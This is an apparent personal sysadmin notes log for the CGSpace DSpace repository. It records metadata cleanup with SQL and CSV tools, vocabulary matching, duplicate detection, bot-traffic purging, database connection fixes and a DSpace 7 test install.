localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-affiliations.csv WITH CSV HEADER;
COPY 8091
```
## 2021-09-23
- Peter sent me back the corrections for the affiliations
- It is about 1,280 corrections and fourteen deletions
- I cleaned them up in csv-metadata-quality and then extracted the deletes and fixes to separate files to run with `fix-metadata-values.py` and `delete-metadata-values.py`:
```console
$ csv-metadata-quality -i ~/Downloads/2021-09-20-affiliations.csv -o /tmp/affiliations.csv -x cg.contributor.affiliation
$ csvgrep -c 'correct' -m 'DELETE' /tmp/affiliations.csv > /tmp/affiliations-delete.csv
$ csvgrep -c 'correct' -r '^.+$' /tmp/affiliations.csv | csvgrep -i -c 'correct' -m 'DELETE' > /tmp/affiliations-fix.csv
$ ./ilri/fix-metadata-values.py -i /tmp/affiliations-fix.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
$ ./ilri/delete-metadata-values.py -i /tmp/affiliations-delete.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
```
- Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
```
- Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too
- Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne
- Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:
```console
localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
COPY 1139
```
## 2021-09-24
- Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case
- It seems that these fields are all still using UPPER CASE:
- cg.subject.alliancebiovciat
- cg.species.breed
- cg.subject.bioversity
- cg.subject.ccafs
- cg.subject.ciat
- cg.subject.cip
- cg.identifier.iitatheme
- cg.subject.iita
- cg.subject.ilri
- cg.subject.pabra
- cg.river.basin
- cg.coverage.subregion (done)
- dcterms.audience (done)
- cg.subject.wle
- We can do some of these without even asking anyone, for example `cg.coverage.subregion`, `cg.river.basin`, and `dcterms.audience`
- First, I will look at `cg.coverage.subregion`
- These should ideally come from ISO 3166-2 subdivisions
- I will sentence case them and then create a controlled vocabulary from those that are matching (and worry about cleaning the rest up later)
```console
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
UPDATE 2903
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
COPY 1200
```
- Then I process the list for matches with my `subdivision-lookup.py` script, and extract only the values that matched:
```console
$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
$ wc -l /tmp/subregions-matched.txt
81 /tmp/subregions-matched.txt
```
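- The script itself isn't shown in these notes, but a minimal sketch of the matching idea, assuming `pycountry` provides the ISO 3166-2 subdivision names (the real `subdivision-lookup.py` may differ), could look like:
```python
#!/usr/bin/env python3
# Minimal sketch of an ISO 3166-2 subdivision lookup, assuming pycountry for
# the subdivision data; the real subdivision-lookup.py may work differently.
import csv
import sys

import pycountry

# Build a set of subdivision names for case-insensitive matching
subdivisions = {subdivision.name.lower() for subdivision in pycountry.subdivisions}

writer = csv.writer(sys.stdout)
writer.writerow(["subregion", "matched"])

with open(sys.argv[1]) as f:
    for line in f:
        value = line.strip()
        if value:
            writer.writerow([value, str(value.lower() in subdivisions).lower()])
```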
- Then I updated the controlled vocabulary in the submission forms
- I did the same for `dcterms.audience`, taking special care with a few all-caps values:
```console
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
```
- Update submission form comment for DOIs because it was still recommending people use the "dx.doi.org" format even though I batch updated all DOIs to the "doi.org" format a few times in the last year
- Then I updated all existing metadata to the new format again:
```console
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE 49
```
## 2021-09-26
- Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs
- This could explain why I had problems harvesting last week, when I only had 90,000 items...
- I started a fresh harvest on AReS
- I realized that the sitemap on MELSpace is missing so AReS skips it, which means we cannot harvest right now... ouch
- I sent a message to Salem and he fixed it quickly
- I added WorldFish's DSpace Statistics API instance to AReS before starting the plugins and now our numbers are much higher, nice!
## 2021-09-27
- Add CGIAR Action Area (cg.subject.actionArea) to CGSpace as Peter had asked me a few days ago
## 2021-09-28
- Francesca from the Alliance asked for help moving a bunch of reports from one collection to another on CGSpace
- She is having problems with the "move" dialog taking minutes for each item
- I exported the collection and sent her a copy with just the few fields she would need in order to mark the ones that need to move, then I can do the rest:
```console
$ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
```
- She sent it back fairly quickly with a new column marked "Move" so I extracted those items that matched and set them to the new owning collection:
```console
$ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
```
- Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace
- I looked at the PostgreSQL activity and it seems low:
```console
postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
59
```
- Locks look high though:
```console
postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
1154
```
- Indeed it seems something started causing locks to increase yesterday:
![PostgreSQL locks week](/cgspace-notes/2021/09/postgres_locks_ALL-week.png)
- And query length increasing since yesterday:
![PostgreSQL query length week](/cgspace-notes/2021/09/postgres_querylength_ALL-week.png)
- The number of DSpace sessions is normal, hovering around 1,000...
- Looking closer at the PostgreSQL activity log, I see the locks are all held by the `dspaceCli` user... which seems weird:
```console
postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
1096
```
- Now I'm wondering why there are no connections from `dspaceApi` or `dspaceWeb`. Could it be that our Tomcat JDBC pooling via JNDI isn't working?
- I see the same thing on DSpace Test hmmmm
- The configuration in `server.xml` is correct, but it could be that when I changed to using the updated JDBC driver from `pom.xml` instead of dropping it in the Tomcat lib directory that something broke...
- I downloaded the latest JDBC jar and put it in Tomcat's lib directory on DSpace Test and after restarting Tomcat I can see connections from `dspaceWeb` and `dspaceApi` again
- I will do the same on CGSpace and then revert the JDBC change in Ansible and DSpace `pom.xml`
## 2021-09-29
- Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
COPY 149
```
- Then validate and format the matches:
```console
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
```
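- `agrovoc-lookup.py` itself isn't shown in these notes; a rough sketch of the idea is to query a Skosmos-style REST search endpoint for each term (the base URL and response fields below are assumptions, not necessarily what the real script uses):
```python
#!/usr/bin/env python3
# Rough sketch of validating subject terms against AGROVOC via a Skosmos-style
# REST search endpoint. The base URL and response fields are assumptions; the
# real agrovoc-lookup.py may use a different endpoint and logic.
import csv
import sys

import requests

API_URL = "https://agrovoc.fao.org/browse/rest/v1/search"  # assumed endpoint

writer = csv.writer(sys.stdout)
writer.writerow(["subject", "matched"])

with open(sys.argv[1]) as f:
    for line in f:
        term = line.strip()
        if not term:
            continue
        response = requests.get(API_URL, params={"query": term, "lang": "en"})
        response.raise_for_status()
        results = response.json().get("results", [])
        writer.writerow([term, "yes" if results else "no"])
```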
- I talked to Salem about depositing from MEL to CGSpace
- He mentioned that the one issue is that when you deposit to a workflow you don't get a Handle or any kind of identifier back!
- We might have to come to some kind of agreement that they deposit items without going into the workflow but that we have some kind of edit role in MEL
- He also said that they are looking into using the Research Organization Registry (RoR) in MEL, at least adding the `ror_id` and storing it
- I need to propose this to Peter again and perhaps start aligning our affiliations closer (I could even do something like the country codes with a process that scans every day)
- Talk to Moayad about OpenRXV
- We decided that we'd keep harvesting all the Handles from the Altmetric prefix API, but then have a plugin to retrieve DOI scores that we can run manually
## 2021-09-30
- Look over 292 non-IWMI publications from Udana for inclusion into the Virtual library on water management collection on CGSpace
- I did some minor cleanup to remove blank columns and run it through the csv-metadata-quality tool
- I told him to add licenses and journal volume/issue and asked Abenet for input as well
<!-- vim: set sw=2 ts=2: -->

content/posts/2021-10.md
---
title: "October, 2021"
date: 2021-10-01T11:14:07+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-10-01
- Export all affiliations on CGSpace and run them against the latest RoR data dump:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
```
- So we have 1879/7100 (26.46%) matching already
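- For reference, a minimal sketch of matching affiliation strings against the RoR JSON dump (field names assumed from the v1 dump format; the real `ror-lookup.py` may differ):
```python
#!/usr/bin/env python3
# Minimal sketch of matching affiliation strings against a RoR JSON data dump.
# The field names ("name", "aliases", "acronyms", "labels") are assumed from
# the v1 dump format; the real ror-lookup.py may handle more cases.
import csv
import json
import sys

ror_file, affiliations_file = sys.argv[1], sys.argv[2]

# Collect all known organization names (lowercased) from the dump
names = set()
with open(ror_file) as f:
    for org in json.load(f):
        names.add(org["name"].lower())
        names.update(alias.lower() for alias in org.get("aliases", []))
        names.update(acronym.lower() for acronym in org.get("acronyms", []))
        names.update(label["label"].lower() for label in org.get("labels", []))

writer = csv.writer(sys.stdout)
writer.writerow(["affiliation", "matched"])
with open(affiliations_file) as f:
    for line in f:
        value = line.strip()
        if value:
            writer.writerow([value, str(value.lower() in names).lower()])
```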
<!--more-->
## 2021-10-03
- Dominique from IWMI asked me for information about how CGSpace partners are using CGSpace APIs to feed their websites
- Start a fresh indexing on AReS
- Udana sent me his file of 292 non-IWMI publications for the Virtual library on water management
- He added licenses
- I want to clean up the `dcterms.extent` field though because it has volume, issue, and pages there
- I cloned the column several times and extracted values based on their positions, for example:
- Volume: `value.partition(":")[0]`
- Issue: `value.partition("(")[2].partition(")")[0]`
- Page: `"p. " + value.replace(".", "")`
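- Outside OpenRefine, the same `partition()` logic looks like this in plain Python (the sample extent value is just an assumption for illustration; in practice the expressions were applied to cloned/intermediate columns):
```python
# Illustration of the str.partition() calls used in the OpenRefine (Jython)
# expressions above. The sample extent value is an assumption; the real
# cleanup worked on cloned columns so the inputs at each step may have differed.
value = "21(4):334-341."

volume_part = value.partition(":")[0]                      # "21(4)" (volume plus issue)
issue = value.partition("(")[2].partition(")")[0]          # "4"
pages = "p. " + value.partition(":")[2].replace(".", "")   # "p. 334-341"

print(volume_part, issue, pages)
```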
## 2021-10-04
- Start looking at the last month of Solr statistics on CGSpace
- I see a number of IPs with "normal" user agents who clearly behave like bots
- 198.15.130.18: 21,000 requests to /discover with a normal-looking user agent, from ASN 11282 (SERVERYOU, US)
- 93.158.90.107: 8,500 requests to handle and browse links with a Firefox 84.0 user agent, from ASN 12552 (IPO-EU, SE)
- 193.235.141.162: 4,800 requests to handle, browse, and discovery links with a Firefox 84.0 user agent, from ASN 51747 (INTERNETBOLAGET, SE)
- 3.225.28.105: 2,900 requests to REST API for the CIAT Story Maps collection with a normal user agent, from ASN 14618 (AMAZON-AES, US)
- 34.228.236.6: 2,800 requests to discovery for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 18.212.137.2: 2,800 requests to discovery for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 3.81.123.72: 2,800 requests to discovery and handles for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- 3.227.16.188: 2,800 requests to discovery and handles for the CGIAR System community with user agent `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`, from ASN 14618 (AMAZON-AES, US)
- Looking closer into the requests with this Mozilla/4.0 user agent, I see 500+ IPs using it:
```console
# zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
# wc -l /tmp/mozilla-4.0-ips.txt
543 /tmp/mozilla-4.0-ips.txt
```
- Then I resolved the IPs and extracted the ones belonging to Amazon:
```console
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
```
- I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon
- Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:
```console
1592 GET /handle/10947/2526
1592 GET /handle/10947/2527
1592 GET /handle/10947/34
1593 GET /handle/10947/6
1594 GET /handle/10947/1
1598 GET /handle/10947/2515
1598 GET /handle/10947/2516
1599 GET /handle/10568/101335
1599 GET /handle/10568/91688
1599 GET /handle/10947/2517
1599 GET /handle/10947/2518
1599 GET /handle/10947/2519
1599 GET /handle/10947/2708
1599 GET /handle/10947/2871
1600 GET /handle/10568/89342
1600 GET /handle/10947/4467
1607 GET /handle/10568/103816
290382 GET /handle/10568/83389
```
- Before I purge all those I will ask Samuel Stacey from the System Office to hopefully get some insight...
- Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
- Meeting with Michelle from Altmetric about their new CSV upload system
- I sent her some examples of Handles that have DOIs, but no linked score (yet) to see if an association will be created when she uploads them
```csv
doi,handle
10.1016/j.agsy.2021.103263,10568/115288
10.3389/fgene.2021.723360,10568/115287
10.3389/fpls.2021.720670,10568/115285
```
- Extract the AGROVOC subjects from IWMI's 292 publications to validate them against AGROVOC:
```console
$ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc.txt -o /tmp/agrovoc-matches.csv
$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
```
## 2021-10-05
- Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
- I added `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)` to the list of bad bots in nginx
- I purged all the Amazon IPs using this user agent, as well as the few other IPs I identified yesterday
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
...
Total number of bot hits purged: 465119
```
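- Under the hood that purge is essentially a Solr delete-by-query per IP against the statistics core; a minimal sketch of the idea (the real `check-spider-ip-hits.sh` also counts hits first and handles more cases):
```python
#!/usr/bin/env python3
# Minimal sketch of purging statistics hits for a list of IPs using a Solr
# delete-by-query. The real check-spider-ip-hits.sh counts the hits first and
# handles more cases; this only shows the basic idea.
import sys

import requests

SOLR_URL = "http://localhost:8081/solr/statistics/update"

with open(sys.argv[1]) as f:
    ips = [line.strip() for line in f if line.strip()]

for ip in ips:
    response = requests.post(
        SOLR_URL,
        params={"softCommit": "true"},
        json={"delete": {"query": f'ip:"{ip}"'}},
    )
    response.raise_for_status()
    print(f"Purged hits from {ip}")
```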
## 2021-10-06
- Thinking about how we could check for duplicates before importing
- I found out that [PostgreSQL has a built-in similarity function](https://www.freecodecamp.org/news/fuzzy-string-matching-with-postgresql/):
```console
localhost/dspace63= > CREATE EXTENSION pg_trgm;
localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
metadata_value_id │ text_value │ dspace_object_id
───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
(2 rows)
```
- I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
- I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
- I think I will check for similar titles, and if I find them I will print out the handles for verification
- I could also proceed to check other metadata like type because those shouldn't vary too much
- I ran my new `check-duplicates.py` script on the 292 non-IWMI publications from Udana and found twelve potential duplicates
- Upon checking them manually, I found that 7/12 were indeed already present on CGSpace!
- This is with the similarity threshold at 0.5. I wonder if tweaking that higher will make the script run faster and eliminate some false positives
- I re-ran it with higher thresholds; this eliminated all false positives, but it still took 24 minutes to run for 292 items!
- 0.6: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 24:40.42 total
- 0.7: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.12s user 0.03s system 0% cpu 24:29.15 total
- 0.8: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 25:44.13 total
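- For reference, the core of such a check is one trigram similarity query per title; a rough sketch with psycopg2 (the connection details, CSV column name, and threshold are assumptions based on the SIMILARITY() query shown above, and the real `check-duplicates.py` may differ):
```python
#!/usr/bin/env python3
# Rough sketch of the title-based duplicate check: for each title in a CSV,
# run a pg_trgm SIMILARITY() query against existing item titles (field 64).
# The connection details, CSV column name, and 0.6 threshold are assumptions;
# the real check-duplicates.py may differ.
import csv
import sys

import psycopg2

conn = psycopg2.connect("dbname=dspace user=dspace password=fuuu host=localhost")

with open(sys.argv[1]) as f, conn.cursor() as cursor:
    for row in csv.DictReader(f):
        title = row["dc.title[en_US]"]
        cursor.execute(
            """SELECT text_value, dspace_object_id FROM metadatavalue
               WHERE dspace_object_id IN (SELECT uuid FROM item)
               AND metadata_field_id=64
               AND SIMILARITY(text_value, %s) > 0.6""",
            (title,),
        )
        for text_value, uuid in cursor.fetchall():
            print(f"Possible duplicate of '{title}': {text_value} ({uuid})")

conn.close()
```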
- Some minor updates to csv-metadata-quality
- Fix two issues with regular expressions in the duplicate items and experimental language checks
- Add a check for items that have a DOI listed in their citation, but are missing a standalone DOI field
- Then I ran this new version of csv-metadata-quality on an export of IWMI's community, minus some fields I don't want to check:
```console
$ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
$ xsv split -s 2000 /tmp /tmp/iwmi.csv
```
- I noticed each CSV import only resulted in 10 or 20 corrections, and notably none of the duplicate metadata value removals were applied...
- I cut a subset of the fields from the main CSV and tried again, but DSpace said "no changes detected"
- The duplicates are definitely removed from the CSV, but DSpace doesn't detect them
- I realized this is an issue I've had before, but forgot because I usually use csv-metadata-quality for new items, not ones already inside DSpace!
- I found a comment on a thread on the dspace-tech mailing list from helix84 in 2015 ("'No changes were detected' when importing metadata via XMLUI") where he says:
> It's very likely that multiple values in a single field are being compared as an unordered set rather than an ordered list.
> Try doing it in two imports. In first import, remove all authors. In second import, add them in the new order.
- Shit, so that's worth looking into...
## 2021-10-07
- I decided to upload the cleaned IWMI community by moving the cleaned metadata field from `dcterms.subject[en_US]` to `dcterms.subject[en_Fu]` temporarily, uploading them, then moving them back, and uploading again
- I started by copying just a handful of fields from the iwmi.csv community export:
```console
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
# Copy and blank columns in OpenRefine
$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
```
- It takes a few hours per 2,000 items because DSpace processes them so slowly... sigh...
## 2021-10-08
- I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:
```console
cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2603711
en_Fu | 115568
en | 8818
| 5286
fr | 2
vn | 2
| 0
(7 rows)
cgspace=# BEGIN;
cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
UPDATE 129673
cgspace=# COMMIT;
```
- So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
391
```
- I tried to export ILRI's community, but ran into the export bug (DS-4211)
- After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
```console
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l
32070
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
19315
```
- It seems there are only about 200 duplicate values in this subset of fields in ILRI's community:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
220
```
- I found a cool way to select only the items with corrections
- First, extract a handful of fields from the CSV with csvcut
- Second, clean the CSV with csv-metadata-quality
- Third, rename the columns to something obvious in the cleaned CSV
- Fourth, use csvjoin to merge the cleaned file with the original
```console
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
```
- Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
```
if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
```
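- The same check could be done outside OpenRefine with a few lines of Python on the joined CSV (a sketch, assuming the column names created above):
```python
# Sketch of flagging changed rows outside OpenRefine, assuming the joined CSV
# contains both the original (en_US) and cleaned (en_Fu) subject columns.
import csv

with open("/tmp/ilri-deduplicated-items-cleaned-joined.csv") as f:
    for row in csv.DictReader(f):
        if row["dcterms.subject[en_US]"] != row["dcterms.subject[en_Fu]"]:
            print(f"{row['id']}: different")
```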
- For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
- After these are uploaded I will normalize the `text_lang` fields in PostgreSQL again
- I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
```console
$ grep -c 'Removing duplicate value' /tmp/out.log
7720
```
- I applied these to the CIAT community, so in total that's over 8,000 duplicate metadata values removed in a handful of fields...
## 2021-10-09
- I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
- Also of note, there are some other fixes too, for example in IITA's community:
```console
$ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
249
```
- I ran a full Discovery re-indexing on CGSpace
- Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
```console
$ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
```
- I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs
## 2021-10-10
- Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on `metadata-export` (DS-4211)
- First create a new PostgreSQL 13 container:
```console
$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
```
- Then edit the settings in `dspace/config/local.cfg` and build the backend server with Java 11:
```console
$ mvn package
$ cd dspace/target/dspace-installer
$ ant fresh_install
# fix database not being fully ready, causing Tomcat to fail to start the server application
$ ~/dspace7/bin/dspace database migrate
```
- Copy Solr configs and start Solr:
```console
$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
$ ~/src/solr-8.8.2/bin/solr start
```
- Start my local Tomcat 9 instance:
```console
$ systemctl --user start tomcat9@dspace7
```
- This works, so now I will drop the default database and import a dump from CGSpace
```console
$ systemctl --user stop tomcat9@dspace7
$ dropdb -h localhost -p 5433 -U postgres dspace7
$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest dspace-2021-10-09.backup
$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
```
- Delete Atmire migrations and some others that were "unresolved":
```console
$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
```
- Now DSpace 7 starts with my CGSpace data... nice
- The Discovery indexing still takes seven hours... fuck
- I tested the `metadata-export` on DSpace 7.1-SNAPSHOT and it still has the duplicate items issue introduced by DS-4211
- I filed a GitHub issue and notified nwoodward: https://github.com/DSpace/DSpace/issues/7988
- Start a full reindex on AReS
## 2021-10-11
- Start a full Discovery reindex on my local DSpace 6.3 instance:
```console
$ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
Loading @mire database changes for module MQM
Changes have been processed
836140:6543.6
```
- So that's 1.8 hours versus 7 on DSpace 7, with the same database!
